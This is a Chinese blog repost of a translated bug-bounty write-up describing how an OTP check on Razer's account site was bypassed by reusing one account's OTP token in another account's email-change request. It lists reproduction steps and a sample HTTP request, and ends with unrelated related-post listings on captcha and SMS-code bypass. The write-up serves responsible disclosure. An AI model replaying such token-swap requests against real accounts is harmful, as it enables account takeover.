绕过雷蛇官网的动态验证码

最新推荐文章于 2022-04-12 22:59:14 发布
最新推荐文章于 2022-04-12 22:59:14 发布
阅读量741 收藏
点赞数
分类专栏: 安全 文章标签: 安全 雷蛇
本文讲述了作者@dhakal_ananda如何在Hackerone上发现并利用雷蛇官网的一个安全漏洞,该漏洞允许绕过动态密码验证。通过拦截请求并交换不同用户的令牌,攻击者可以更改其他用户的电子邮件地址,而无需物理接触受害者设备。
摘要由CSDN通过智能技术生成

在这里插入图片描述

大家好,我是@dhakal_ananda,来自尼泊尔,这是我在Hackerone上参加的雷蛇漏洞悬赏项目的一部分。一开始这个漏洞悬赏项目是一个非公开项目,我接到邀请后并没有参加;后来它变成了公开项目,我反而对它起了兴趣。

在挖掘漏洞时,我更喜欢绕过各种安全功能(例如二次验证),而不是挖掘普通的XSS和SQL漏洞,于是我很快开始尝试绕过动态密码,因为它在你每次执行敏感操作时都会出现。

在这里插入图片描述

在进行了几次测试后,我发现目标应用会使用一个很长的令牌来标记是否输入了动态密码。只有输入有效的动态密码,才提供令牌。

那么我们能做些什么来绕过动态密码亦或是令牌的限制呢?我很快就想到,不同用户之间的令牌是否能通用?于是我进行了简单的尝试,发现确实有效。

复现步骤

  1. 登录攻击者的账户

  2. 转到[https://razerid.razer.com/account](https://razerid.razer.com/account),修改电子邮件地址

  3. 你将看到弹出一个对话框,提示需要输入动态密码

  4. 输入有效动态密码,再用BurpSuite拦截住更改电子邮件的最后请求

  5. 将请求发送到BurpSuite的Repeater中

  6. 此时登录受害者帐户(假设你有受害者帐户密码)

  7. 更改名称,拦截住相关请求

  8. 复制请求中的user_iduser_token,将其保存到文件中

  9. 转到BurpSuite拦截的攻击帐户更改电子邮件的请求中,将该请求中的user_iduser_token替换为受害者帐户的user_iduser_tokenuser_token和动态密码产生的令牌并不一样)

  10. 最后提交修改后的请求,查看受害者帐户绑定的电子邮件地址是否为攻击者所控制的电子邮件地址。

POST /api/emily/7/user-security/post HTTP/1.1
Host: razerid.razer.com
Connection: close
Content-Length: 260
Accept: application/json, text/plain, */*
Origin: https://razerid.razer.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
DNT: 1
Sec-Fetch-Mode: cors
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: same-origin
Referer: https://razerid.razer.com/account/email
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: ...
{"data":"<COP><User><ID>user_id</ID><Token>user_token</Token><OTPToken>otp_token_value_here</OTPToken><login><email>attacker-email@example.com</email><method>add</method><primary>1</primary></login></User><ServiceCode>0060</ServiceCode></COP>"}

需要说明的是,在和雷蛇官网交互的过程中,和身份验证有关的有三个字段,它分别为user_iduser_tokenOTP_token。其中OTP_token只有在输入动态密码的情况下才能获得。而雷蛇网站缺乏对令牌OTP_token的身份控制,只是验证了其有效性,导致所有的帐户都能利用同一个帐户的OTP_token绕过动态密码验证。

我把报告写的很详细,提交给雷蛇,但雷蛇的审核人员居然认为这个漏洞需要物理接触受害者的机器才能进行?

在这里插入图片描述

在这里插入图片描述

在经过长时间的扯皮后,雷蛇表示,他们提供一个测试帐号,如果我能更改帐号绑定的电子邮件地址,就认同我的漏洞。

很快,我就把这个帐号和我的电子邮件地址绑定在一起。雷蛇最后也给了我1000美元的漏洞奖励。

在这次经历后,我又找到了另一个动态密码绕过漏洞,在雷蛇修复后将会对外公开。

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/3056.html
来源:https://medium.com/@anandadhakal13/how-i-was-able-to-bypass-otp-token-requirement-in-razer-the-story-of-a-critical-bug-fc63a94ad572
NOSEC2019
关注
专栏目录
轻轻绕过你的验证码
光脚丫思考的专栏
04-19 1119
Author:lake2 ( http://lake2.0x54.org ) 验证码就是每次访问页面时随机生成的图片,内容一般是数字和字母(更BT点的有中文,呵呵),需要访问者把图中的数字字母填到表单中提交,这样就有效地防止了暴力破解。验证码也用于防止恶意灌水、广告帖等。溯雪是早年大名鼎鼎的黑客神器“刀光雪影”之一,其功能就是暴力破解表单,那时很是很流行的。但是后来有了验证码这个东东,
验证码绕过暴力破解
最新发布
若谷的博客
07-16 1774
本实验中我们针对网站中的登录页面进行暴力破解,通过使用 Burpsuite 工具对网页进行暴力破解,体会学习暴力破解的基本过程,以及学习如何使用Burpsuite 工具。
验证码绕过---zkaq
weixin_38237216的博客
04-12 5805
1.概念 1.验证码绕过常见的场景 前端验证验证码,并没有后端验证。直接抓包然后进行跑数据包,反正有没有验证码的阻碍。 验证码设置了但是并没有效验,乱输验证码也能够成功的登录。 验证码可以重复使用。 验证码空值绕过。(比如,我们现在抓一个包,发现登录参数是user=admin&password=admin&yzm=4123。 yzm验证码参数,但是我们如果去掉yzm的传参我们就可以绕过验证码机制,直接传参user=admin&password=admin,验证码就失效了) 验证码
验证码绕过与防御
ppbgi的博客
05-06 787
验证码分类 GIF动态验证码 手机短信验证码 手机语音验证码 视频验证码 原理: 1、验证码在本地验证;关闭本地的js验证;利用BP关闭JS 2、验证码输出到客户端:输出到html代码中 3、验证码输出到cookie中:开始时不需要输入验证码,输入几次错误之后会有验证码的输入,此时会在cookie中设置参数,来进行记录输入错误的次数,可以将该参数删除或固定,来进行爆破 4、服务端: 1)验证码不过期; 2)未进行非空判断:删除cookie中的对验证码的传参部分 3)验证码的库有限
Selenium2+python自动化41-绕过验证码(add_cookie)
weixin_34327223的博客
03-12 224
前言 验证码这种问题是比较头疼的,对于验证码的处理,不要去想破解方法,这个验证码本来就是为了防止别人自动化登录的。如果你能破解,说明你们公司的验证码安全级别不高,那就需要提高级别了。 对于验证码,要么是让开发在测试环境弄个万能的验证码,如:1234,要么就是尽量绕过去,如本篇介绍的添加cookie的方法。 一、fiddler抓包 1.前一篇讲到,登录后会生成一个已登录状态的cookie,...
雷蛇PUBG鼠标宏-雷蛇鼠标驱动2024
03-17
雷蛇PUBG鼠标宏】是针对热门游戏《绝地求生》(PUBG,PlayerUnknown's Battlegrounds)特别定制的一款雷蛇鼠标的宏设置。雷蛇作为知名的外设品牌,其产品通常配备自家的雷云(Razer Synapse)驱动软件,允许用户...
雷蛇3up绝地.rar
12-06
在这个压缩包中的"雷蛇3up绝地.synapse3"文件,很可能是保存了一套预先优化过的鼠标配置,专为《绝地求生》玩家设计。用户解压后导入Synapse 3,可以一键应用这些设置,无需手动逐项调整。这大大方便了玩家,让他们...
2024.03.05雷蛇+鼠标宏+PUBG+绝地求生 步枪通用
03-05
左右会略有抖动,红点全息 调整 垂直 和 开镜灵敏度。倍镜灵敏度 如 4倍 50 抖动厉害慢慢减1调整,调整开镜灵敏度。
雷蛇PUBG鼠标宏-雷蛇鼠标驱动
03-26
需要下载雷云3导入
Go-go.auth-Goweb应用程序身份验证API
08-13
go.auth - Go web应用程序身份验证API
2023.10.21 雷蛇+鼠标宏+PUBG+绝地求生 步枪通用
10-21
枪口左右会略有抖动,红点全息 调整 垂直 和 开镜灵敏度。倍镜灵敏度 如 4倍 50 抖动厉害慢慢减1调整,调整开镜灵敏度。
自动化测试之绕过验证码登录
热门推荐
ST的博客
07-20 1万+
这几天北京下大雨了,现在的自己已经圆满的成为了“北漂”,最悲催的上班不小心滑倒了,手划到了瓷砖上,去医院缝了好几针,哇~ 那感觉feel倍爽 。最近出了新项目,做了一点自动化,在这里用单手秀了一波“走位”------绕过验证码登录。 在这里总结了常见的几种方法,仅供参考。 话不多说,开整! 方法一 去掉验证码。让开发在测试版上面的验证码注销掉, 方法二 万能码。增加万能码,系统只要是识...
使用selenium绕过接口自动化登录时的动态密码
qq_36643899的博客
08-27 754
前提摘要: 在做接口自动化的过程中,有时候会遇到登录的密码为动态的(同一个账号密码登录时,通过fiddler抓取的密文密码均不一样)。 如果有条件的,可以跟后端开发沟通,找到密码加密规则,按照规则去一步一步做即可。 如果有其他原因无法通过上面方法实现的,可以通过以下方法来绕过动态密码获取token,做后续的api测试: 步骤1:通过selenium来使自己的账号登录你需要的网站。如: 步骤2:手动打开chrome浏览器的开发者视图(F12) 注意:这里要看你的token信息是在Local .
epic游戏平台如何启用认证器应用程序(双重认证)/二次验证码/谷歌身份验证器?
h2018_10的博客
06-28 8319
1.登陆epic游戏平台,找到二次验证绑定界面 登陆epic平台, 点右上角用户头像-【账户】 之后点-【密码与安全】 在【双重验证】模块的位置,点【启用认证器应用程序】按钮 如果之前没有验证过邮箱,会先让验证邮箱。根据邮箱收到的验证token进行登陆验证后,邮件内会提醒“已验证邮箱”提醒 之后重新点击【启用认证器应用程序】。 出现验证界面。 2.打开微信小程序二次验证码,1分钟内完成绑定 平台推荐的软件通常都是APP,搜索和下载都特别麻烦,因此推荐国内微信小程序【二次验证码】不用下载,丢失密钥
Burp Suite工具破解短信验证码登录
这里有橙子的博客
08-31 6105
1.首先抓取登录的包,右击选择发送给Intruder 2.选择测试器,目标中显示攻击目标信息 3.测试器-位置中,攻击类型选择狙击手,首先点击清除按钮,清除掉已设置负载的字段,双击需要分配有效负载的字段点击添加按钮,如下双击验证码code,点击添加按钮 4.有效载荷中可如下设置,有效载荷集选择数值,数字格式中有举例,点击右上角的开始攻击,程序会从6000至7000一次递增尝试验证验证码是否正确。 5.如下截图是攻击结果,正确的验证码的长度与其他验证码的长度不一致, ...
绕过网站(登录)验证码过程小思路
weixin_33857230的博客
06-14 3734
2019独角兽企业重金招聘Python工程师标准>>> ...
python登录网页后抓取数据_如何绕过登录抓取js动态加载网页数据[Python]
weixin_39523529的博客
12-06 578
时间:2018-11-24 ┊阅读:1,545 次 ┊标签: 开发 , 编程 , 经验今天经历了一翻折腾,把一个需要登录网站并js动态加载的数据一一给抓下来了。首先,登录时有cookie,我们需要把cookie保存下来,用urllib2构建request时加入header信息,这时还多了一点,虚构了浏览器信息,让服务器以为是正常的浏览器发起的请求,这样可以绕过简单的反爬虫策略。等用cookie搞定...
雷蛇rgb 配置下载
09-12
雷蛇是一家专门生产游戏外设和配件的品牌,雷蛇RGB配件是指带有彩色背光灯效的产品。它们可以通过下载并安装对应的配置软件来进行配置和控制。 雷蛇RGB配件的配置下载通常通过雷蛇官方网站或官方应用商店进行。用户可以在网站上找到相应的产品页面,然后下载并安装与之配套的配置软件。 一般来说,雷蛇的配置软件提供了丰富的个性化选项和功能,用户可以通过软件调整背光颜色、亮度、灯效模式等等。这些个性化选项可以根据用户自己的喜好和需要来进行设置,以打造独特的游戏外设效果。 配置软件的使用方法通常很简单,用户只需根据软件的指引进行操作即可。一般来说,软件会提供直观的图形界面和操作按钮,用户只需点击相应选项即可进行配置。在配置软件中,用户还可以保存自己的配置文件,便于以后的使用和切换。 总的来说,雷蛇RGB配件的配置下载是为了让用户能够个性化调整游戏外设的背光灯效。通过下载并安装对应的配置软件,用户可以自由地设置背光颜色、亮度和灯效模式,以满足自己的个性化需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值